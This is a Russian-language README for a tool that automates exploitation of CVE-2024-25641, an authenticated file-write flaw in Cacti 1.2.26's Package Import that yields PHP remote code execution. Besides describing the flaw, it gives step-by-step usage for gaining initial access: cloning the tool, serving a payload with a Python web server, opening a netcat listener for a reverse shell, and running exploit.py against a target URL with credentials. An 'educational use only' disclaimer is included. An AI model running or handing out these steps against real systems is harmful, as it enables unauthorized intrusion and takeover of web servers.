
CVE-2024-25641 - Автоматический эксплойт RCE - Cacti 1.2.26
Полностью автоматизированный эксплойт для CVE-2024-25641. Когда пользователь аутентифицирован, Cacti версии 1.2.26 уязвим к произвольной записи файлов; эта уязвимость эксплуатируется через функцию "Package Import" и позволяет аутентифицированным пользователям, имеющим разрешение "Import Templates", выполнять произвольный PHP-код на веб-сервере (RCE).
Авторство этого PoC: https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (Я просто автоматизировал это, чтобы получить первоначальный доступ.)
Этот инструмент предназначен только для образовательных и тестовых целей. Автор этого инструмента не несет ответственности за любое неправильное использование или незаконные действия, совершенные с его помощью. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Несанкционированный доступ к компьютерным системам является незаконным и неэтичным.
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26
# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>
# Setup netcat listener
nc -lvnp <LOCAL_PORT>
# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>
Вы также можете посмотреть это: CVE-2024-25641 PoC